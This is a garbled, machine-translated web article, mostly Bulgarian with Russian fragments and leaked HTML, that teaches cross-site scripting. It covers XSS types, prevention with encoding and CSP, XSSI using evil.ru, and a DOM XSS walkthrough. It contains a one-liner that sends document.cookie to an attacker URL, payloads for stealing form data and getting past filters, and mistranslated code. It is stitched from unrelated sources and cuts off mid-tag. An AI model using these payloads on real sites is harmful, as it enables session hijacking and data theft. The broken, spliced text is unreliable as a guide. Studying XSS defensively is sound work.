Пасивно xss. Лесен хак: Как да получите данни чрез включване на скриптове между сайтове

И е изчерпателен урок за междусайтови скриптове.

Част първа: преглед

Какво е XSS?

Скриптове между сайтове ( Английски Междусайтови скриптове) Това е атака с инжектиране на код, която позволява на нападателя да изпълни злонамерен JavaScript в браузъра на друг потребител.

Нападателят не атакува директно жертвата си. Вместо това той използва уязвимост в уебсайта, който жертвата посещава, и инжектира злонамерен JavaScript код. Браузърът на жертвата показва злонамерен JavaScript като легитимна част от уебсайта, а самият уебсайт действа като пряк съучастник на нападателя.

Инжектиране на злонамерен JavaScript код

Единственият начин нападателят да стартира злонамерен JavaScript в браузъра на жертвата е да го инжектира в една от страниците, които жертвата изтегля от уебсайта. Това е възможно, ако уебсайтът позволява на потребителите да въвеждат данни в неговите страници и нападателят може да вмъкне ред, който ще бъде открит като част от кода в браузъра на жертвата.

Примерът по-долу показва прост скрипт от страна на сървъра, който се използва за показване на последния коментар на сайт:

отпечатай " "
печат "Последен коментар:"
отпечатайте база данни.последнияComment
отпечатай ""

Скриптът приема, че коментарът се състои само от текст. Въпреки това, тъй като директното въвеждане на потребителя е активирано, нападателят може да остави този коментар: "". Всеки потребител, който посети страницата, вече ще получи следния отговор:

Последен коментар:

Когато браузърът на потребителя зареди страницата, той ще изпълни всичко, включително JavaScript, съдържащ се в етикетите ... Това показва, че самото присъствие на нападател, инжектиращ скрипт, е проблем, независимо от това какъв конкретен код на скрипта се изпълнява в действителност.

Част втора: XSS атака

Участници в XSS атака

Преди да опишем подробно как работи една XSS атака, трябва да идентифицираме участниците в XSS атаката. Като цяло има трима участници в XSS атака: уеб сайт, жертва, и крекер.

уеб сайтсъздава HTML страници за потребители, които ги поискат. В нашите примери той се намира на http: // уебсайт /.
- База данни на уебсайтовее база данни, която съхранява част от данните, въведени от потребителите на страниците на сайта.
ЖертваРедовен потребител на уебсайт, който иска страници от него чрез своя браузър.
АтакуващЕ нападател, който възнамерява да започне атака срещу жертвата, като използва XSS уязвимост на сайта.
- Сървър за кракерТова е уеб сървър под контрола на нападател с единствената цел да открадне поверителната информация на жертвата. В нашите примери той се намира на адрес http: // атакуващ /.

Примерен сценарий за атака

Този скрипт ще създаде HTTP заявка към различен URL, който ще пренасочи браузъра на потребителя към сървъра на нападателя. URL адресът включва бисквитките на жертвата като параметър на заявка, когато HTTP заявка пристигне на сървъра на нападателя, нападателят може да извлече тези бисквитки от заявката. След като нападателят получи бисквитките, той може да ги използва, за да се представя за жертва и да започне последваща атака.

Оттук нататък горният HTML код ще бъде извикан злонамерен низили злонамерен скрипт... Важно е да се разбере, че самият низ е злонамерен само ако в крайна сметка се обработва като HTML в браузъра на жертвата, което може да се случи само ако има XSS уязвимост в уебсайта.

Как работи този пример за атака

Диаграмата по-долу показва пример за нападател, извършващ атака:

Нападателят използва една от формите на уебсайта, за да вмъкне зловреден низ в базата данни на уебсайта.
Жертвата иска страница от уебсайт.
Сайтът включва злонамерен низ от базата данни в отговора и го изпраща на жертвата.
Браузърът на жертвата изпълнява злонамерения скрипт в отговора, изпращайки бисквитката на жертвата до сървъра на нападателя.

Типове XSS

Целта на XSS атака винаги е да се изпълни злонамерен JavaScript скрипт в браузъра на жертвата. Има няколко принципно различни начина за постигане на тази цел. XSS атаките често се категоризират в три типа:

Съхранен (постоянен) XSSкъдето злонамереният низ произхожда от базата данни на уебсайта.
Отразен (променлив) XSSкъдето злонамереният низ се създава от заявката на жертвата.
DOMs XSSкъдето уязвимостта се появява в кода от страна на клиента, а не в кода от страна на сървъра.

Предишният пример показва съхранена XSS атака. Сега ще опишем два други типа XSS атаки: Reflected XSS и DOM XSS.

Отразен XSS

При отразена XSS атака, злонамереният низ е част от заявката на жертвата към уебсайта. Сайтът приема и вмъква този злонамерен низ в отговора, който изпраща обратно на потребителя. Диаграмата по-долу илюстрира този сценарий:

Жертвата е измамена от нападателя да изпрати URL заявка до уебсайта.
Сайтът включва злонамерен низ от URL адреса на заявката в отговора на жертвата.
Браузърът на жертвата изпълнява злонамерения скрипт, съдържащ се в отговора, изпращайки бисквитката на жертвата до сървъра на нападателя.

Как да се защитим успешно от XSS атаки?

Отразената XSS атака може да изглежда безобидна, тъй като изисква от жертвата да изпрати заявка от тяхно име, която съдържа злонамерен низ. Тъй като никой няма да се самонапада доброволно, изглежда, че няма начин действително да се извърши атаката.

Както се оказва, има поне два често срещани начина да накарате жертвата да започне отразена XSS атака срещу себе си:

Ако потребителят е конкретно лице, нападателят може да изпрати злонамерен URL адрес на жертвата (например чрез имейл или месинджър) и да ги подмами да отвори връзката, за да посети уебсайта.
Ако целта е голяма група потребители, нападателят може да публикува връзка към злонамерен URL (например на собствен уебсайт или социална мрежа) и да изчака посетителите да щракнат върху връзката.

И двата метода са сходни и и двата могат да бъдат по-успешни чрез използване на услуги за съкращаване на URL адреси за маскиране на злонамерения низ от потребители, които могат да го идентифицират.

XSS в DOM

DOM XSS е вариант както на съхранена, така и на отразена XSS атака. При тази XSS атака злонамереният низ не се обработва от браузъра на жертвата, докато не се изпълни действителният JavaScript на уебсайта. Диаграмата по-долу илюстрира този сценарий за отразена XSS атака:

Нападателят създава URL, съдържащ злонамерен низ и го изпраща на жертвата.
Жертвата е измамена от нападателя да изпрати URL заявка до уебсайта.
Сайтът приема заявката, но не включва злонамерения низ в отговора.
Браузърът на жертвата изпълнява легитимния скрипт, съдържащ се в отговора, в резултат на което злонамереният скрипт ще бъде вмъкнат в страницата.
Браузърът на жертвата изпълнява злонамерения скрипт, вмъкнат в страницата, изпращайки бисквитката на жертвата до сървъра на нападателя.

Каква е разликата между XSS в DOM?

В предишните примери за съхранени и отразени XSS атаки, сървърът инжектира злонамерен скрипт в страницата, който след това се препраща в отговор на жертвата. Когато браузърът на жертвата получи отговор, той приема, че злонамереният скрипт е част от легитимното съдържание на страницата и автоматично го изпълнява по време на зареждане на страницата, както всеки друг скрипт.

В примера за DOM XSS атака злонамереният скрипт не се вмъква като част от страницата; единственият скрипт, който се изпълнява автоматично по време на зареждане на страницата, е легитимната част от страницата. Проблемът е, че този легитимен скрипт директно използва въвеждането на потребителя, за да добави HTML към страницата. Тъй като злонамереният низ се вмъква в страницата с помощта на innerHTML, той се анализира като HTML, което кара злонамерения скрипт да се изпълни.

Това разграничение е малко, но много важно:

В традиционния XSS злонамереният JavaScript се изпълнява при зареждане на страницата като част от HTML, изпратен от сървъра.
В случай на XSS в DOM, злонамереният JavaScript се изпълнява след като страницата се зареди, което кара тази легитимна JavaScript страница да има достъп до въвеждането на потребителя (съдържащ злонамерения низ) по небезопасен начин.

Как работи XSS в DOM?

В предишния пример JavaScript не се изисква; сървърът може сам да генерира целия HTML. Ако кодът от страна на сървъра не съдържаше уязвимости, уебсайтът нямаше да бъде уязвим към XSS уязвимостта.

Въпреки това, тъй като уеб приложенията стават по-напреднали, все повече и повече HTML страници се генерират с помощта на JavaScript от страна на клиента, а не на сървъра. По всяко време съдържанието трябва да се промени, без да се опреснява цялата страница, това е възможно с помощта на JavaScript. По-специално, това е случаят, когато страницата се обновява след AJAX заявка.

Това означава, че XSS уязвимостите могат да присъстват не само от страна на сървъра на кода на вашия сайт, но и от страна на JavaScript на клиента на вашия сайт. Следователно, дори и с напълно безопасен код от страна на сървъра, клиентският код все още може да не е безопасен за включването на въвеждане от потребителя, когато DOM се актуализира след зареждане на страницата. Ако това се случи, тогава кодът от страна на клиента ще позволи XSS атака не по вина на кода от страна на сървъра.

Базираният на DOM XSS може да не се вижда от сървъра

Има специален случай на DOM XSS атака, при която злонамереният низ никога не се изпраща до сървъра на уебсайта: това се случва, когато злонамереният низ се съдържа в фрагмента на URL идентификатора (всичко след знака #). Браузърите не изпращат тази част от URL адреса на сървъра, така че уебсайтът не може да бъде достъпен чрез код от страна на сървъра. Кодът от страна на клиента обаче има достъп до него и по този начин е възможно да се проведе XSS атака чрез несигурна обработка.

Този случай не се ограничава до идентификатора на фрагмента. Има и други потребителски данни, които са невидими за сървъра, като например нови HTML5 функции като LocalStorage и IndexedDB.

част трета:
Предотвратяване на XSS

Техники за превенция на XSS

Като напомняне, XSS е атака с инжектиране на код: въвеждането на потребителя погрешно се интерпретира като злонамерен код. Необходима е безопасна работа с въвеждането, за да се предотврати този тип инжектиране на код. За уеб разработчик има два фундаментално различни начина за извършване на защитена обработка на входа:

Кодиранее начин, който позволява на потребителя да въвежда данни само като данни и не позволява на браузъра да се обработва като код.
Валидиранее начин за филтриране на въведеното от потребителя, така че браузърът да го интерпретира като код без злонамерени команди.

Въпреки че това са коренно различни методи за превенция на XSS, те имат няколко общи неща, които е важно да разберете, когато използвате някой от тях:

Контекст Безопасната обработка на входа трябва да се извършва по различен начин в зависимост от това къде се използва въвеждането на потребителя на страницата. входящ/изходящ Сигурна обработка на входа може да се извърши или когато вашият сайт получи вход (входящ трафик), или точно преди сайтът да вмъкне въведени от потребителя в съдържанието на страницата (изходящ). Клиент/сървър Защитената обработка на входа може да се извърши или от страна на клиента, или от страна на сървъра, всяка от които е необходима при различни обстоятелства.

Преди да обясним подробно как работи кодирането и валидирането, ние описваме всяка една от тези точки.

Обработка на въвеждане от потребителя в контексти

Има много контексти на уеб страница, където може да се приложи въвеждането на потребителя. За всеки от тях трябва да се спазват специални правила, така че въвеждането на потребителя да не може да „избяга“ от неговия контекст и да не може да бъде интерпретирано като злонамерен код. Следните са най-често срещаните контексти:

Колко важни са контекстите?

Във всички описани контексти може да възникне XSS уязвимост, ако въвеждането на потребителя е било вмъкнато преди първото кодиране или валидиране. Нападателят може да инжектира злонамерен код, просто като вмъкне затварящ разделител за този контекст, последван от злонамерен код.

Например, ако в даден момент уебсайт включва въвеждане от потребителя директно в HTML атрибут, нападателят може да инжектира злонамерен скрипт, като започне въвеждането им с кавички, както е показано по-долу:

Това можеше да бъде предотвратено чрез просто премахване на всички кавички във въвеждането на потребителя и би било добре, но само в този контекст. Ако входът е бил вмъкнат в различен контекст, затварящият разделител ще бъде различен и инжектирането ще бъде възможно. Поради тази причина безопасното боравене с въвеждане трябва винаги да бъде адаптирано към контекста, в който ще бъде вмъкнат потребителският вход.

Обработка на входящ/изходящ потребителски вход

Инстинктивно може да изглежда, че XSS може да бъде предотвратен чрез кодиране или валидиране на всички потребителски данни, веднага щом нашият сайт го получи. По този начин всички злонамерени низове вече ще бъдат неутрализирани, когато са включени в страницата, а скриптовете за генериране на HTML няма да се притесняват за безопасното обработване на въведеното от потребителя.

Проблемът е, че, както беше описано по-рано, въвеждането на потребителя може да бъде вмъкнато в множество контексти на страницата. И няма лесен начин да се определи кога въведеното от потребителя влиза в контекста - как в крайна сметка ще бъде вмъкнато, и един и същ потребителски въведен често трябва да бъде вмъкнат в различни контексти. Като разчитаме на обработката на входящия вход, за да предотвратим XSS, ние създаваме много крехко решение, което ще бъде податливо на грешки. (Наследените PHP магически кавички са пример за такова решение.)

Вместо това, обработката на изходящ вход трябва да бъде вашата основна линия на защита срещу XSS, тъй като може да вземе предвид специфичния контекст на това, което потребителски вход ще бъде вмъкнат. До известна степен входящата валидация може да се използва за добавяне на вторичен слой на защита, но повече за това по-късно.

Където е възможно безопасно да се обработва въвеждането на потребителя

В повечето съвременни уеб приложения, въвеждането на потребителя се обработва както в кода от страна на сървъра, така и от кода от страна на клиента. За да се защити срещу всички видове XSS, сигурната обработка на входа трябва да се извършва както в код от страна на сървъра, така и от клиентски код.

За да се защити от традиционния XSS, сигурната обработка на въвеждане трябва да се извършва в код от страна на сървъра. Това се прави с помощта на език, поддържан от сървъра.
За да се защити срещу XSS атака в DOM, където сървърът никога не получава злонамерен низ (като атаката с фрагмент на идентификатор, описана по-рано), трябва да се извърши защитена обработка на входа в код от страна на клиента. Това се прави с помощта на JavaScript.

След като обяснихме защо контекстът има значение, защо разликата между входящата и изходящата обработка на входа е важна и защо безопасната обработка на входа трябва да се извършва както от страна на клиента, така и от страна на сървъра, можем да продължим да обясняваме как двата типа защитени обработката на входа (кодиране и валидиране) реално се извършват.

Кодиране

Кодирането е изход от ситуация, при която е необходимо браузърът да интерпретира въведеното от потребителя само като данни, а не като код. Най-популярният тип кодиране в уеб разработката е HTML маскирането, което преобразува знаци като напр < и > v < и > съответно.

Следният псевдокод е пример за това как въвеждането на потребителя (потребителското въвеждане) може да бъде кодирано с помощта на HTML маскиране и след това вмъкнато в страница с помощта на скрипт от страна на сървъра:

отпечатай " "
печат "Последен коментар:"
печат encodeHtml (userInput)
отпечатай ""

Ако потребителят въведе следния ред, полученият HTML ще изглежда така:

Последен коментар:

Тъй като всички знаци със специално значение са маскирани, браузърът няма да анализира никоя част от въведеното от потребителя като HTML.

Кодиране от страна на клиента и сървъра

Когато се изпълнява кодиране от страна на клиента, винаги се използва JavaScript, който има вградени функции, които кодират данни за различни контексти.

Когато правите кодиране във вашия сървърен код, вие разчитате на функциите, налични във вашия език или рамка. Поради големия брой налични езици и рамки, този урок няма да обхване подробностите за кодирането на конкретен сървър или език на рамката. Въпреки това, функциите за кодиране на JavaScript от страна на клиента се използват и при писане на код от страна на сървъра.

Кодиране от страна на клиента

Когато кодирате потребителски вход от страна на клиента с JavaScript, има няколко вградени метода и свойства, които автоматично кодират всички данни в контекстно чувствителен стил:

Последният контекст, споменат по-горе (стойности в JavaScript) не е включен в този списък, тъй като JavaScript не предоставя вграден начин за кодиране на данни, които биха били включени в изходния код на JavaScript.

Ограничения за кодиране

Дори при кодиране е възможно да се използват злонамерени низове в някои контексти. Отличен пример за това е, когато въвеждането на потребителя се използва за предоставяне на URL, като в примера по-долу:

document.querySelector ("a"). href = userInput

Въпреки че посочената стойност в свойството на елемента href автоматично го кодира, така че да се превърне в нищо повече от стойността на атрибута, това само по себе си не пречи на нападателя да вмъкне URL, който започва с "javascript:". Когато се щракне върху връзката, независимо от конструкцията, вграденият JavaScript в URL адреса ще бъде изпълнен.

Кодирането също не е ефективно решение, когато искате потребителите да могат да използват някои от HTML кодовете на страницата. Пример би била страница с потребителски профил, където потребителят може да използва персонализиран HTML. Ако този обикновен HTML е кодиран, страницата на профила може да се състои само от обикновен текст.

В ситуации като тази кодирането трябва да бъде допълнено от валидиране, с което ще се запознаем по-нататък.

Валидиране

Валидирането е актът на филтриране на въведеното от потребителя, така че всички злонамерени части от него да бъдат премахнати, без да се налага премахване на целия код в него. Един от най-използваните видове валидиране в уеб разработката ви позволява да използвате някои HTML елементи (напр. и ), но забрана на други (напр.

С правилно дефинирана CSP политика, браузърът не може да зареди и изпълни злонамерен ‑ script.js, защото http: // атакуващ / не е посочен като доверен източник. Въпреки че сайтът не беше в състояние да обработва надеждно въвеждането на потребителя, в този случай политиката на CSP предотврати уязвимостта и всяка вреда.

Дори ако нападателят инжектира код в кода на скрипта, вместо да свързва към външен файл, правилно конфигурираната политика на CSP също би забранила инжектирането в JavaScript код, предотвратявайки уязвимостта и причинявайки всякаква вреда.

Как да активирам CSP?

По подразбиране браузърите не използват CSP. За да активирате SCP на вашия уебсайт, страниците трябва да съдържат допълнителна HTTP заглавка: Съдържание ‑ Защита ‑ Политика. Всяка страница, съдържаща тази заглавка, ще прилага правила за сигурност в момента на зареждане от браузъра, при условие че браузърът поддържа CSP.

Тъй като политиката за сигурност се изпраща с всеки HTTP отговор, е възможно на сървъра да се зададе индивидуално политиката за всяка страница. Една и съща политика може да се приложи към целия уебсайт чрез вмъкване на една и съща CSP заглавка във всеки отговор.

Стойността в заглавката Content-Security-Policy съдържа низ, който дефинира една или повече политики за сигурност, които ще се прилагат към вашия сайт. Синтаксисът на този ред ще бъде описан по-късно.

Примерите за заглавия в този раздел използват прекъсвания на редове и отстъп за яснота; те не трябва да се появяват в това заглавие.

Синтаксис на CSP

Синтаксисът за заглавката на CSP е както следва:

Политика за съдържание – сигурност – политика:
директива източник-израз, източник-израз, ...;
директива ...;
...

Този синтаксис има два елемента:

директивикоито са низове, указващи вида на ресурса, взет от дадения списък.

Изходни изразие модел, описващ един или повече сървъри, от които могат да се зареждат ресурси.

За всяка директива данните в изходния израз определят кои източници могат да се използват за зареждане на ресурси от съответния тип.

директиви

Следните директиви могат да се използват в заглавката на CSP:

свържете ‑ src

шрифт-src

рамка-src

img ‑ src

media-src

обект-src

скрипт-src

style-src

В допълнение към това, специалната директива default-src може да се използва за предоставяне на стойност по подразбиране за всички директиви, които не са включени в заглавката.

Изходен израз

Синтаксисът за създаване на изходен израз е както следва:

протокол: // име на хост: номер на порт

Името на хост може да започва с *, което означава, че всеки поддомейн на предоставеното име на хост ще бъде разрешен. По същия начин номерът на порта може да бъде представен като *, което означава, че всички портове ще бъдат разрешени. В допълнение, протоколът и номерът на порта могат да бъдат пропуснати. Ако не е посочен протокол, политиката ще изисква всички ресурси да бъдат заредени чрез HTTPS.

В допълнение към горния синтаксис, изходният израз може алтернативно да бъде една от четирите ключови думи със специално значение (включени кавички):
"няма" деактивира ресурсите. "self" разрешава ресурси от хоста, на който се намира уеб страницата. "unsafe-inline" разрешава ресурсите, съдържащи се в страницата, като вградени
Има два вида XSS уязвимости - пасивни и активни.

Активна уязвимостпо-опасно, тъй като нападателят не трябва да примамва жертвата с помощта на специална връзка, той просто трябва да инжектира кода в базата данни или някакъв файл на сървъра. Така всички посетители на сайта автоматично стават жертви. Може да се интегрира например с помощта на SQL инжекция. Следователно, не трябва да се доверявате на данните, съхранявани в базата данни, дори ако са били обработени по време на вмъкване.

Пример пасивна уязвимостможете да намерите в самото начало на статията. Тук вече е необходимо социално инженерство, например важно писмо от администрацията на сайта с молба за проверка на настройките на вашия акаунт след възстановяване от резервно копие. Съответно, трябва да знаете адреса на жертвата или просто да организирате спам имейл или публикация в някакъв форум, а дори и да не е фактът, че жертвите ще бъдат наивни и ще щракнат върху вашата връзка.

Освен това параметрите POST и GET могат да бъдат обект на пасивна уязвимост. С POST параметрите, разбира се, трябва да използвате някои трикове. Например пренасочване от уебсайта на нападателя.

Следователно уязвимостта GET е малко по-опасна, т.к по-лесно е жертвата да забележи грешен домейн, отколкото незадължителния параметър (въпреки че URL адресът може да бъде кодиран изцяло).

Кражба на бисквитки

Това е най-често цитираният пример за XSS атака. В бисквитките сайтовете понякога съхраняват някаква ценна информация (понякога дори потребителското име и паролата (или нейния хеш) на потребителя), но най-опасната е кражбата на активна сесия, така че не забравяйте да щракнете върху връзката „Изход“ на сайтовете, дори и да е домашен компютър. За щастие при повечето ресурси продължителността на сесията е ограничена.
Var іmg = ново изображение (); іmg.srс = "http: //site/xss.php?" + document.cookie;
Затова въведохме ограничения на домейна за XMLHttpRequest, но нападателят не се страхува, тъй като има , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i2.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Про возможность получения различной информации со сторонних сайтов с помощью простой атаки - Cross Site Scripting Inclusion (XSSI).</p> <p>Если ты читаешь Easy Hack систематически, то, наверное, уже хорошо знаком с Same Origin Policy (SOP), мы к нему часто возвращаемся. Из-за SOP возможность взаимодействия между двумя «сайтами» очень ограничена. Но так как задача получения и оправки информации на одном сайте с другого возникает часто, то были внедрены различные методы для «смягчения» политики и организации взаимодействия. Например, такие, как CORS или crossdomain.xml. Один из более старых методов - подгрузка JavaScript с другого домена через тег <script> . SOP нас здесь ничем не ограничивает: можно указать практически произвольное месторасположение.</p><p>К примеру, есть хост атакующего evil.ru и сайт жертвы - victim.com. На evil.ru мы можем положить файл HTML и сослаться на любой скрипт у жертвы:</p><p> <script src="http://victim.com/any_script_.js"></script> </p><p>Когато потребител влезе в уебсайта на нападателя, браузърът ще изтегли и стартира JS от жертва.com, но в контекста на evil.ru SOP. Това означава, че от JS на самия нападател, ще можем да получим достъп до данни (не всички) JS от сървъра на жертвата.</p> <p>Например съдържанието на JS от сайта на жертвата (http://victim.com/any_script_.js):</p><p>Var a = "12345";</p><p>След това на уебсайта на нападателя можем да получим стойността на променливата:</p><p> <script src="http://victim.com/any_script_.js"></script> <script>console.log(a);</script> </p><p>Идеята за работа е проста като алуминиев чайник.</p> <p>Всъщност възможността за зареждане на статичен JS от други сайтове не създава повече проблеми за сайта жертва, отколкото зареждането на изображение.</p> <p>Проблеми могат да възникнат, когато JS се генерира динамично, тоест, когато съдържанието на JS скрипта се променя въз основа на данните от бисквитката, в зависимост от това кой потребител има достъп до него. Например, в JS се съхранява някаква „критична“ информация: лична информация (имейл, потребителско име на сайта на жертвата) или техническа информация (анти CSRF токени).</p> <p>Но, както знаем, при зареждане на скрипта през тага<script> браузер пользователя автоматически отправляет cookie пользователя. Сложив эти факты, мы получаем возможность получать информацию о любом пользователе, который зашел на сайт атакующего и при этом залогинен на сайте-жертве.</p> <p>Что же мы можем узнать? Глобальные переменные и результаты работы глобальных функций. К сожалению, доступа к внутренним переменным/функциям нам не получить (хотя, возможно, кто-то найдет способ сделать и это).</p><p>Function test(){ return "private data frm function"; } </p><p>Такая атака выглядит возможной, но кажется, что она слишком проста и не должна быть распространенной. Этим и интересна презентация на Black Hat. Исследователи проанализировали 150 популярных сайтов и обнаружили, что в той или иной мере уязвима треть из них. Такая статистика заставляет взглянуть на проблему чуть более пристально.</p> <p>Была выявлена и еще одна закономерность. Content Security Policy становится все более распространенной. Как ты знаешь, с ней мы можем указать, с каких доменов может быть подгружен тот или иной ресурс. Например, можно сказать исполнять JS только с того же ресурса. Кроме того, лучшие практики настройки CSP подразумевают запрет на запуск inline JS (то есть кода, который находится прямо в HTML, а не подгружен из JS-файла).</p> <p>Однако перенос inline в файлы может быть сделан с костылями и на скорую руку - то есть посредством динамически генерируемых скриптов. Так как CSP никак не влияет на XSSI, мы опять-таки можем проводить наши атаки. Вот такая вот bad practice.</p> <p>Межсайтовый скриптинг (XSS) - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p> <p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу - это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP - этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>То веб-страница отобразит:</p><p>Привет! Нравится твой сайт. </p><p>А если пользователь введёт так:</p><p>Привет! Нравится твой сайт.<script>alert("Pwned")</script> </p><p>След това ще се покаже така:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Браузърите съхраняват много бисквитки на голям брой сайтове. Всеки сайт може да получава само бисквитки, запазени от него. Например example.com е съхранил някои бисквитки във вашия браузър. Ако посетите сайт на another.com, този сайт (клиентски и сървърни скриптове) няма достъп до бисквитките, съхранени от example.com.</p> <p>Ако сайтът example.com е уязвим към XSS, това означава, че можем по един или друг начин да инжектираме JavaScript код в него и този код ще бъде изпълнен от името на сайта example.com! Тези. този код например ще получи достъп до бисквитките на сайта example.com.</p> <p>Мисля, че всеки помни, че JavaScript се изпълнява в браузърите на потребителя, т.е. при наличието на XSS, инжектираният злонамерен код получава достъп до данните на потребителя, отворил страницата на уебсайта.</p> <p>Инжектираният код може да прави всичко, което JavaScript може, а именно:</p> <ul><li>осъществява достъп до бисквитките на сайта, който разглеждате</li> <li>може да прави всякакви промени във външния вид на страницата</li> <li>осъществява достъп до клипборда</li> <li>може да инжектира JavaScript програми, например ключове (прихващачи на натиснати клавиши)</li> <li>кука на BeEF</li> <li>и т.н.</li> </ul><p>Най-простият пример за бисквитки:</p><p> <script>alert(document.cookie)</script> </p><p>Всъщност, <b>тревога</b>използва се само за XSS откриване. Истинският злонамерен полезен товар извършва скрити действия. Той комуникира тайно с отдалечения сървър на нападателя и прехвърля откраднатите данни към него.</p> <h2>XSS изгледи <br></h2> <p>Най-важното нещо, което трябва да разберете за типовете XSS, е, че те са:</p> <ul><li>Съхранено (постоянно)</li> <li>Отразено (непостоянно)</li> </ul><p>Пример за константи:</p> <ul><li>Специално създадено съобщение от книгата за гости (коментар, съобщение във форума, профил), въведено от нападател и запазено на сървъра, се изтегля от сървъра всеки път, когато потребителите поискат да покажат тази страница.</li> <li>Нападател получи достъп до сървърни данни, например чрез SQL инжекция и инжектира злонамерен JavaScript код (с кейлогъри или с BeEF) в данните, показвани на потребителя.</li> </ul><p>Пример за променливи:</p> <ul><li>В сайта има търсене, което заедно с резултатите от търсенето показва нещо от рода на „Търсихте: [търсенен низ]“, докато данните не са филтрирани правилно. Тъй като такава страница се показва само на тези, които имат връзка към нея, атаката няма да работи, докато нападателят не изпрати връзката на други потребители на сайта. Вместо да изпращате връзка към жертвата, можете да използвате поставянето на злонамерен скрипт на неутрален сайт, посетен от жертвата.</li> </ul><p>Те също така разграничават (някои като вид променливи XSS уязвимости, някои казват, че този вид може да бъде вид постоянен XSS):</p> <ul><li>DOM модели</li> </ul><h2>Характеристики на базирания на DOM XSS <br></h2> <p>Казано по-просто, можем да видим злонамерения код на "обикновен" непостоянен XSS, когато отворим HTML кода. Например връзката се формира така:</p><p>Http://example.com/search.php?q= "/><script>alert(1)</script> </p><p>И когато отваряме изходния HTML код, виждаме нещо подобно:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">намирам</button> </form> </p><p>И DOM XSS променя структурата на DOM, която се формира в браузъра в движение и можем да видим злонамерения код само когато преглеждаме формираната DOM структура. Това не променя HTML. Нека вземем следния код като пример:</p><p> <!DOCTYPE html> <html> <head> <title>сайт ::: DOM XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default">Възникна грешка ...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>След това в браузъра ще видим:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Изходен код на страницата:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>Нека оформим адреса, както следва:</p><p>Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)</script>; </p><p>Сега страницата изглежда така:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>Но нека да разгледаме HTML източника:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>Там изобщо нищо не се е променило. Това казах, трябва да разгледаме DOM структурата на документа, за да идентифицираме злонамерен код:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>Ето работещ прототип на XSS, за реална атака ни трябва по-сложен полезен товар, което е невъзможно поради факта, че приложението спира да чете веднага след точката и запетаята, и нещо от рода на <b>предупреждение (1); предупреждение (2)</b>вече не е възможно. Въпреки това, благодарение на <b>избяга ()</b>във върнатите данни можем да използваме полезен товар като този:</p><p>Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)%3balert(2)</script>; </p><p>Къде сменихме символа <b>; </b>към URI кодиран еквивалент!</p> <p>Вече можем да напишем злонамерен JavaScript полезен товар и да съставим връзка, която да бъде изпратена до жертвата, както се прави при стандартните непостоянни скриптове между сайтове.</p> <h2>XSS одитор <br></h2> <p>В Google Chrome (както и в Opera, която сега използва двигателя на Google Chrome), бях в изненада като тази:</p> <blockquote> <p>dom_xss.html: 30 XSS Auditor отказа да изпълни скрипт в предупреждение "http: //localhost/tests/XSS/dom_xss.html#input=token ‹script› (1)</script>; "защото неговият изходен код беше намерен в заявката. Одиторът беше активиран, тъй като сървърът не изпрати нито заглавка "X-XSS-Protection", нито" Content-Security-Policy".</p> </blockquote> <p><img 